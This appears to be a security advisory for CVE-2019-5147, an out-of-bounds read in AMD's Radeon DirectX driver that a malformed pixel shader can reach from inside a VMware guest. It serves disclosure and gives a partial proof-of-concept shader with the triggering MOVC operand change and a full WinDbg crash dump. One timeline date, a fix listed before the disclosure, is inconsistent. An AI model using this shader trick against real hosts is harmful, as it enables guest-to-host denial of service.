CVE-2019-5147
An exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13003.1007. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.
AMD ATIDXX64.DLL (26.20.13003.1007) running on Radeon RX 550 / 550 Series VMware Workstation 15 (15.5.0 build-14665864) with Windows 10 x64 as guestVM
http://amd.com http://vmware.com
8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-125: Out-of-bounds Read
This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest OS). Such attack can be triggered from from VMware guest usermode to cause an out-of-bounds read in the vmware-vmx.exe process on host, or theoretically through WEBGL (remote website).
Example shader:
ps_4_1
00000000: dcl_global_flags refactoringAllowed
00000001: dcl_constant_buffer cb0[3].xyzw, immediateIndexed
00000002: dcl_sampler sampler[0]
00000003: dcl_sampler sampler[1]
00000004: dcl_sampler sampler[2]
...
00000020: movc r1.x, sampler[1], r1.z, r1.x
By modifying the MOVC instruction (Component-wise conditional move) operand from “movc r1.x, r1.y, r1.z, r1.x” to “movc r1.x, sampler[1], r1.z, r1.x”, it is possible to cause an out-of-bounds read access violation.
As you can see below, after the shader operand modification, the RCX register used as INDEX in the “MOV RDX,QWORD PTR [RAX+RCX*8]” is set to 0xffffffff.
(6b4.1720): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
0:000> r
rax=0000014ace649a18 rbx=00007ff8e2c70000 rcx=00000000ffffffff
rdx=0000014ace6499f8 rsi=0000000000000010 rdi=0000014ace647fd8
rip=00007ff8e3088d8c rsp=00000036545796e0 rbp=0000000000000010
r8=0000000000000004 r9=00007ff8e35d1594 r10=0000000000000001
r11=0000014ace8e3398 r12=0000014ace647f00 r13=0000000000000000
r14=0000000000000000 r15=0000014ace6490e0
iopl=0 nv up ei ng nz ac po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010296
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for VENDOR_ONLY.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Read
Key : Timeline.OS.Boot.DeltaSec
Value: 233600
Key : Timeline.Process.Start.DeltaSec
Value: 68
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2019-10-11T12:02:20.144Z
Diff: 7855 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2019-10-11T12:02:28.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2019-10-11T12:01:20.0Z
Diff: 68000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2019-10-08T19:09:08.0Z
Diff: 233600000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff8e3088d8c (atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003aeabc)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00000152ce649a10
Attempt to read from address 00000152ce649a10
FAULTING_THREAD: 00001720
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: VENDOR_ONLY.exe
FOLLOWUP_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8 mov rdx,qword ptr [rax+rcx*8]
READ_ADDRESS: 00000152ce649a10
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00000152ce649a10
WATSON_BKT_PROCSTAMP: 5cb740ee
WATSON_BKT_MODULE: atidxx64.dll
WATSON_BKT_MODSTAMP: 5d781adb
WATSON_BKT_MODOFFSET: 418d8c
WATSON_BKT_MODVER: 26.20.13003.1007
MODULE_VER_PRODUCT: Advanced Micro Devices, Inc. Radeon DirectX 11 Driver
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
MODLIST_WITH_TSCHKSUM_HASH: 2467318f4e32d63f6c5405aabc2a43724e772411
MODLIST_SHA1_HASH: 8d415343d816bb4896ee4592431a2c0c44961ee3
NTGLOBALFLAG: 470
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: CLAB
ANALYSIS_SESSION_TIME: 10-11-2019 14:02:20.0144
ANALYSIS_VERSION: 10.0.18362.1 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x1720]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
ID: [0n285]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x1720]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
LAST_CONTROL_TRANSFER: from 00007ff8e304d1f4 to 00007ff8e3088d8c
STACK_TEXT:
00000036`545796e0 00007ff8`e304d1f4 : 00000000`00000000 00000000`00000000 00000036`00000000 00007ff8`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc
00000036`545797c0 00007ff8`e2de6416 : 0000014a`ce647fd8 0000014a`ce837000 0000014a`ce65be00 0000014a`ce837001 : atidxx64!AmdDxGsaFreeCompiledShader+0x372f24
00000036`54579a30 00007ff8`e2dd66d0 : 0000014a`ce621b10 0000014a`ce640098 00000000`00000004 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0x10c146
00000036`54579bf0 00007ff8`e2db5924 : 0000014a`ce621b10 0000014a`ce838640 00000036`5457a430 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc400
00000036`54579c70 00007ff8`e2cf9364 : 00000000`00000001 00000036`5457a430 0000014a`ce838640 00000036`5457a430 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb654
00000036`5457a1f0 00007ff8`e347fa28 : 0000014a`c82f8188 00000036`5457a320 00000036`5457a430 0000014a`c9d4eac0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f094
00000036`5457a220 00007ff8`e346515b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a5758
00000036`5457a390 00007ff8`e3464c92 : 00000000`00000000 0000014a`ce838340 0000014a`ce592890 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78ae8b
00000036`5457a3f0 00007ff8`e34956b3 : 0000014a`ce838340 00000000`00000000 0000014a`ce5f8730 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a9c2
00000036`5457e050 00007ff8`e3464b67 : 00000000`00000004 0000014a`ce8362c0 0000014a`ce5e5a90 0000014a`ce5a06c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bb3e3
00000036`5457e080 00007ff8`e3534701 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a897
00000036`5457e0e0 00007ff8`e2cf4cca : 00000000`00000000 00000000`00000000 00000036`5457e3f0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x85a431
00000036`5457e120 00007ff8`e2cf4b13 : 0000014a`ce5bacd0 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
00000036`5457e160 00007ff8`e2c7c05e : 00000000`00000001 00000000`00000000 00000000`000007a8 00000000`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
00000036`5457e1f0 00007ff8`e33e8146 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
00000036`5457e230 00007ff8`e344bd09 : 00000000`00000000 0000014a`c8289d34 00000036`5457e3f0 00000000`00001400 : atidxx64!AmdDxGsaFreeCompiledShader+0x70de76
00000036`5457e3a0 00007ff8`e2c8d8b1 : 0000014a`ca159988 0000014a`c831b510 ffffffff`fffffffe 00007ff8`fee15113 : atidxx64!AmdDxGsaFreeCompiledShader+0x771a39
00000036`5457e3d0 00007ff8`fee18edc : 00000000`00000000 00000036`5457e600 0000014a`ca159978 00007ff9`04bfbabb : atidxx64!XdxQueryTlsLookupTable+0x185c1
00000036`5457e500 00007ff8`fee2295f : 00000036`00000001 0000014a`c8317928 0000014a`ca159978 0000014a`c830da10 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000036`5457e760 00007ff8`fee2289a : 00000036`5457ee40 00007ff8`fefd2388 0000014a`ca159840 00000000`000007a8 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000036`5457e7f0 00007ff8`fee0ee58 : 0000014a`ca159868 00000036`5457ee40 00000036`5457ee70 00007ff8`fefd2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000036`5457e850 00007ff8`fee1b17d : ffffffff`fffffffe 0000014a`ca159840 00000000`00000014 00000000`00000001 : d3d11!CDevice::CreateLayeredChild+0xc88
00000036`5457ec90 00007ff8`fee1b950 : 0000014a`ca159840 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000036`5457ee00 00007ff8`fee014f4 : 0000014a`c82eff20 00000000`00000009 0000014a`c8289ab0 0000014a`c82f0758 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000036`5457eff0 00007ff8`fee01463 : 0000014a`c8289ab0 00480063`0000c000 00000036`5457f350 00450056`005f0031 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000036`5457f050 00007ff8`fee011e8 : 0000014a`c82f0758 0000014a`c8289ab0 00000000`00000874 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000036`5457f200 00007ff7`6b3d2f16 : 0000014a`c830daf0 00000036`5457f2c8 0000014a`c82f0768 00000000`00000000 : d3d11!CDevice::CreatePixelShader+0x28
...
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: b83b420a1889acfa7499f03138efd1bbb8d42aaa
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 207ff31388f1e8a88dd8a5d3adca8cc37b630abf
THREAD_SHA1_HASH_MOD: 9140cc03c00bea0093c654d38b4e903d793400cd
FAULT_INSTR_CODE: c8148b48
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: atidxx64
IMAGE_NAME: atidxx64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5d781adb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: atidxx64.dll
BUCKET_ID_IMAGE_STR: atidxx64.dll
FAILURE_MODULE_NAME: atidxx64
BUCKET_ID_MODULE_STR: atidxx64
FAILURE_FUNCTION_NAME: AmdDxGsaFreeCompiledShader
BUCKET_ID_FUNCTION_STR: AmdDxGsaFreeCompiledShader
BUCKET_ID_OFFSET: 3aeabc
BUCKET_ID_MODTIMEDATESTAMP: 5d781adb
BUCKET_ID_MODCHECKSUM: 1ae4e65
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: atidxx64.dll!AmdDxGsaFreeCompiledShader
TARGET_TIME: 2019-10-11T12:02:43.000Z
OSBUILD: 18362
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 5b08
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_atidxx64.dll!amddxgsafreecompiledshader
FAILURE_ID_HASH: {08b458dc-1323-2abb-9f1a-d0ac543a793c}
Followup: MachineOwner
---------
2019-10-23 - Vendor Disclosure
2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release
Discovered by Piotr Bania of Cisco Talos.